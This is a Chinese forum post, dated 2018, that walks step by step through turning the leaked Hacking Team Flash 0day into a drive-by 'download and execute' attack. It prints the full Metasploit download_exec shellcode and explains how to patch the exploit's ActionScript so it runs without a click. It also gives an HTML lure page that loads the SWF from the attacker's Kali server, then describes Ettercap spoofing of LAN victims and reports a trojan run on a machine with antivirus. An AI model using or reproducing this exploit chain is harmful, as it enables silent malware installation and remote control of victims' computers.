|
$ }! j3 D, e$ e 三、flash 0day之手工代码修改制作下载者实例入侵演示
Y$ m8 @2 t- w7 y, U+ h" U
( o$ V' g! o+ `" t
: T# B* q |7 o- c' G& x0 u 利用到的工具:
( l- n! _0 ?: a% ~ 1 k# S, I. u. g2 N8 t1 c& K
# ^9 L! Q$ @0 a$ ?- [6 ~8 S, |: y
Msf / m9 b' A' z2 m8 F, A
6 w) i# s$ E+ z2 ^9 G2 o4 R
) J( `- G: v) g5 _3 {7 P [ Ettercap
9 j$ m- c) {( ]- G, }: _
3 \/ V/ I: f! z7 H& h2 H% D1 l4 P& T
Adobe Flash CS6
2 v) [! O9 C+ W% i, m; m + b6 r+ w: Y% G4 m6 R7 M0 U
U% J+ H+ @5 S* Y Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
0 c( [2 P! P+ n9 G
7 A! ~% D1 ^) q
" W. ^( A4 m2 r5 ~0 V1 D5 H6 E 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
6 C) l; V0 D- w. @4 d1 u
0 ~& ]3 j- f _+ @4 \* j
9 c3 m1 `- V) [3 M! L 如图: 7 w% {/ D, O$ G; K* {" k7 N
+ @' v8 b) ]' l k0 N7 |
8 E; q% ]- X& A$ Z1 k8 D1 _+ N
2 x' z- a# ]( T5 [- _3 b: x
: B/ Y6 Y% O* D. |# R
5 D) b b' x5 e: X" q$ o( o  9 Q: r* `6 p: ?6 ?9 U: e% Y0 S {
9 p- J- s1 {7 `6 P3 G% x) F5 @+ S' n6 P6 g5 Y, f
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 2 l1 i3 J" B& Q3 m
4 R. ]% P8 A' l* N; |+ V8 V% c9 k( F+ t
5 {! q9 ~7 M( r3 Z
# E3 }! K+ c8 D. m6 N- ?4 ]
" V* r6 i4 }/ c" ?& S# n! C
 5 U, y3 _6 {; [* H: @6 X8 _- f" d, |
: W& Q0 s& B# n( r
- N6 _# }% M0 m* S3 B6 q. P. w3 B 然后执行generate -t dword生成shellcode,如下:
) F9 z4 ~! f; r4 z2 y 3 h4 B$ l. T/ z! X7 c
) F& o: Z p" M |0 c; v+ N
 6 O3 ]4 g) w, h
# f$ c8 n5 m: |; Z
& k& M6 [1 _% ?9 f 复制代码到文本下便于我们一会编辑flash exp,如下: 2 ~9 L- |* v2 C
. b7 a6 Q! m5 W/ q/ }! V1 x6 [; l; F
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
- |6 E# [7 ]/ B# m) w6 u
# [( G- _- G2 L" g* |
" ^1 I* h& I: }2 ?# ~) a 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, % S. e. n; r1 ?1 g
$ U. V0 }6 [8 h y" z0 p8 c
{ b* l& R# D) ?4 |; h+ I
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
( t+ M0 |& L u [! {1 M
9 c; v8 E; G- ?0 h; T& L% L' n* k6 L" l: n
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 8 X; X8 g# b4 @" A8 g J
6 Z6 k9 K* t- H2 h9 P
- M6 ]- M' o' P5 z# G$ P; H 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, : U9 i: p% }- U& b" w# h8 @! K3 {
5 L1 W" K8 m l0 H$ w! k4 |
' o( f3 ^) k4 y 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 4 v k- z( x! H4 g4 o
# A8 C, J1 ^# m- ]% H
$ z: l) z; O4 ~- v" ] 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 4 a6 L$ ^3 r8 i
2 g# T0 O) P9 B' I$ o8 E7 }
u; a7 |% ~! h- S
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, " q# f) d6 f! r/ u/ U( a- P, ~. _
. @' g0 g* K9 i6 ~4 G8 ^; k- S+ A
. ~, B, \4 R3 C' G1 x& P
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, , F" n8 A, F) c" N$ g8 o B
3 { O2 r: i! Y8 f% n% F* U7 W O
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ; j0 F% s: b0 u
; f0 v0 |6 ?+ Z) j. H% c* ~
! u+ Y+ J) w% c6 h
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, + `; ]: v, b' D2 n7 u9 t
0 W' n% [0 D2 ]; P" x7 P7 Q, v+ f9 T9 T) M# X" U% `
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ' b' [$ V% r+ o
7 G" Y g" X: ~
# z3 `" ~2 `0 a7 K& p
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
' k% j% @$ T# n- \1 y! v: I 1 J |4 Y* P2 x p3 {0 y
5 v, ^. m" I, b& ]% L
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
6 H! c" y9 u; x 3 S. f/ T5 H3 y! C; e C* R( R
/ G. C. d2 ?6 H4 w
$ k0 L' c, d# k' u. w" \. d
, w$ z0 Z% C9 g3 f2 u
& |. \ U7 Y) K7 U/ n) Z# @
) `7 d0 x$ o6 N* E 0 Z( R/ U p# x# `5 F& R) s( A
' l7 J0 a: z, t$ J
下面我们来修改flash 0day exp,需要修改三个文件,分别为: . T3 D* A5 p; T. o+ V$ \6 C
2 W& @- K/ V g" h9 ^4 R3 |! u0 o, Y! D7 q
 - t" w" ~/ i5 w' s/ q x
4 T/ a. H; q5 r6 M0 D$ n0 E$ Z$ K1 Z9 }
先修改ShellWin32.as,部分源代码如图: ' D' S, h7 O4 m/ ]) o8 e
$ v, z4 ?# w2 P7 b$ K6 W( s) B
' I' X n$ g3 v 
# X, l+ A [% |+ G; X/ F ' H1 B4 k/ {0 R" r% P( K
; |! C# f4 A6 }0 \) k 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
5 t+ b3 E1 R3 N/ P( Z# j
1 _/ `. L; B3 s; I, z+ g/ ^9 t9 e
- v6 t/ Q8 `; H& t" K2 n! \+ t
9 D* j& w" K8 Z2 k: H) ^/ p- L! c# m( m
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: - l+ P2 K9 |8 O, ^/ ]
/ a; S9 r$ a! H
. F( i2 z. n+ X- {; u0 e1 g' J
 ; b. o# E- R3 T" Q9 h/ z7 E
4 O" S* @& W5 g a( _7 s. C; x0 p9 w
. F: n1 s6 d: I! E- K 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 3 D# u* v3 a5 F4 V X' S+ @7 J
n; e! ]- P0 C* `/ S
9 O+ \, z- E# U# p
2 [! t5 ^4 C9 k) `: m1 V7 L1 D ) P4 b$ ^0 o( N# m
3 C k0 i+ D4 o
# S! X) [- @% \4 H/ v/ Z' o
$ k q3 d% e J! B* V- [! r# R) G2 p. n
. H! V1 D# U# s. I 7 n9 }+ t& i3 Z/ K0 T
2 s( W- Q1 J s: @* H2 s
然后点保存,下面我们来编译一下,打开
9 v6 V0 }3 S0 u2 W+ ?! v2 C! U3 D 4 Y* S' C8 D0 i
& x+ O, D) V& H# o9 R/ p
exp1.fla然后点文件-发布,看看编译没错误 : Q, z0 s4 z( W3 h1 e
& H* [# I* g1 W6 K* H7 D2 q. E9 }4 c& R% `1 l
- e1 r/ Z+ w7 j$ K( L 6 \3 M' K9 f& w3 W# A
i+ _+ F) a7 ]9 w% }: r
/ X! w# ~! X9 `% o
3 F$ y. d% G" P) f I# C7 H
* \8 B, f- I. P0 Q9 Q9 ? $ ?0 y. R# C6 O4 S
8 q9 V( h# [4 w9 B' \# {
, b0 \) Q V) V: l2 v6 g& {
 - U: S# w7 ^1 I+ x6 [. L
0 ~6 j, g9 I% x V2 K' G
# e6 f5 v( u+ F 然后我们把生成的 7 n8 S! }: ~) O7 i1 I9 |+ E% b
; g0 n. B) Z( x& b! H9 x8 ~
/ u c$ H3 c6 p8 e7 } exp1.swf丢到kailinux 的/var/www/html下:
" y) ]1 C3 b6 S9 H9 C( i, T 2 C8 ~+ g; l7 C7 f
7 z6 B1 [( K- l. r! X
然后把这段代码好好编辑一下
' ^7 C* U' p: e+ k , N9 P+ M9 _0 r4 p, B
2 V- |/ U; j0 ~% `" W 1 i% r U0 T3 |
* {4 b' c$ H2 o& q6 i: r/ K- P1 J& s P' ^ c" v- L& c/ [7 f. f. b& C
! |/ \/ C: E( S7 A- l2 u
1 d6 ?7 L* \% q8 ~# v1 {# P9 @( n# m8 T2 k' g2 \
8 j" k. I# }) L1 s
9 [$ a+ X* f" i% Z0 n, J
! P* w2 G" c# b4 B: z7 M6 U 6 [0 W! ^1 W0 v$ a Q, _/ ~
2 P6 w, ?0 ~9 ?0 e, h8 J4 P \: b1 R# G/ a9 j
* q' S9 X7 ^' T" M5 _+ t' V & _# p I" q& a5 H7 [' a# x
2 S3 {1 e0 S0 I% Y$ P% C* s " k& ~6 _! G; h: u" \; V1 N# b
7 d [+ B$ t: W1 a4 W
" j" ^% p6 o" u. E <!DOCTYPE html> , v$ R$ \8 u& D ~. X1 I/ D
, o0 _" \3 k% S. c. |0 Y* v( _2 m/ G% A. G
<html>
( d$ V, ~. ^: U: m5 c( W
& \6 U: ~7 z( t% A, j' Y8 i, m7 ~/ |9 m! D( U9 p
<head> 9 g' Z( `# r* Z! g
+ Y6 v0 N+ h' W0 z
+ ~; |" }+ b9 x$ r <meta http-equiv="Content-Type" content="text/html;
7 ]5 n+ Y9 f) I" w& A/ I2 W4 F
) _# a/ h6 Y$ X' }$ f6 Q( r; c8 a" B# W; [5 l6 l
charset=utf-8"/>
) o7 s. E) o0 H/ c
/ C1 g8 R( |3 ?# @7 A6 W- k( _* Q. R) j2 X$ w6 q1 [
</head> 0 v5 P; T& e' }' h+ S
7 g) O: [$ r6 k0 {6 F" ], z) q b% y2 d6 r9 l
<body> ' m& p; U# f" `8 k+ w7 X
# v: v, |, [4 b H" G
: B- j$ A# [1 z+ X4 u+ X1 R <h2> Please wait, the requested page is loading...</h2> 8 D" r5 A3 u ^0 ~) l/ n2 x- [
0 i( S. ]/ ?4 c$ L. }! ]
) A7 l8 J0 O9 ? l <br>
# K x; c6 E8 X0 M2 x6 n + ~/ C' f V; U6 Z, Z" V+ b s/ b
7 W$ o9 f; _) G+ i% m& m7 s" A! ?
<OBJECT 9 T/ I" S# J; Z C0 K
1 t2 `3 b' b+ ?! n) G+ H$ Z' P% n% c6 q/ y0 M/ m% M% _7 u
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie ; r$ _0 I& F, c) v; s$ T
" h9 b9 h/ w# ]8 j
5 V% n- j9 |) I# M H; n+ w. n
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
7 e0 b: s( A7 r: o4 Q
9 p, x# p' O9 D
4 F i" h( N/ K; |" O0 X </body> * l! L; J( e, ^" C2 O, L
! F# A+ C2 p" l' ?
+ H6 W" U3 h2 { g# T
<script>
. n' ^' \$ f' i0 z" ]* W* @9 D6 D
* Z J. j0 L$ _( }# S
# B5 [) f6 ?$ H# y! F3 Z setTimeout(function () {
. B! V) T9 G, e f! f, y
' `( d4 u/ \; i [; q k6 h4 b' Q& ~
5 q! R k* m7 o4 {! w7 N
& x- N( P$ U4 z8 k7 _# t( ?- f" r; k' J( x4 Y" ^
window.location.reload(); 4 c1 T& q+ L2 S- {* n
: o3 d0 U! W8 X) ^1 V1 V# N6 o
* F2 l$ k) P1 |8 l }, 10000); ' L& G5 T9 p& @5 h$ }6 Y& d
0 g/ x {9 n8 Z7 c( i
* V& D( X" v: N- C
. M7 W7 e5 l* I% ~0 N. ~# G " c' A! y: |: r5 p. T- e
( p; z+ X# g9 h: b) M$ o* U$ A# V </script> * e0 \5 Q! J+ X/ Q1 S
! n" Q* Z. k# _1 @& _8 G* y9 o
* l; z* P9 b5 [/ |; Y' Z
</html> 8 p/ S7 ]5 c% W( w3 w( Z1 A
9 Y; W) m1 {" q: k4 t. I
$ N- t# d$ l4 O0 R' h9 o$ u. v
7 b N+ ~; |5 r2 h+ [ # r- d5 h k" b+ \+ o8 }
1 H9 A- }( M0 f/ V- C1 E
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 3 P) V4 b: j9 H- j5 _) m9 H
* H4 w; Y3 T* V- [# L) {. U
9 T+ K" M$ A4 k, q5 P 
' T+ D) G9 [4 \$ L $ y' m5 @, H. ?7 z
. J$ g8 z d! _/ R) Q- E$ i, e. p , P7 ^% j) G' e0 F. X) _
$ s: O/ c- B1 \1 v
, ~2 N, v2 p* u; ~2 q" i- y& B + U% V' ~! x5 H; ~
+ p9 P' ?% T% Y2 k1 d0 d; l
2 I0 A8 Y b P& Z
; H0 ]& l( Y+ z' p0 T6 B: U* }/ U8 p3 @ & M- B. E) F9 _% X1 [6 N$ }% S7 w2 T
' w+ p1 M; ~: h9 X 6 `- r. y7 Z. w2 J
: S) `4 q! c l! F/ J9 A1 \) M
( s4 o& q, y/ n1 D2 J2 c
下面我们用ettercap欺骗如图:
$ Z# | j4 u; T
- M7 S! Z- `7 D8 J8 M0 s
$ I p! ]; V& {, M+ _2 p 
& @- P4 C( ~: I$ a. A
' b' m+ C; P n2 i
* g: I) i; N1 A7 A. E& q
# w) V4 m) K, ~) h, j Z . F/ r- d0 z" Q6 I
( E& d/ O. I0 ^- K+ y/ x
下面我们随便访问个网站看看:
! |& k' y# L$ V L- l }5 W4 K w& _2 J2 F. x- g
, |9 [# D) E$ A5 Q
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 3 _8 L9 e, f2 u' _& \0 t
/ E* \4 t/ h( `. @ c4 s
/ @# {6 z/ @0 ~5 W 
4 D7 Q' S4 G8 ]7 z 1 O4 u: f8 ?7 F0 d$ [% {8 w
) @0 l9 c- L- q& X 我们看另一台, 3 i9 Z/ P* o: ? r. ]7 N' ~
* D5 \3 R6 e4 }2 `. d s# [* Q7 L8 P2 \' Y" ?+ @) y
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 ! x' h, k- X5 g9 B7 K# G% i
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对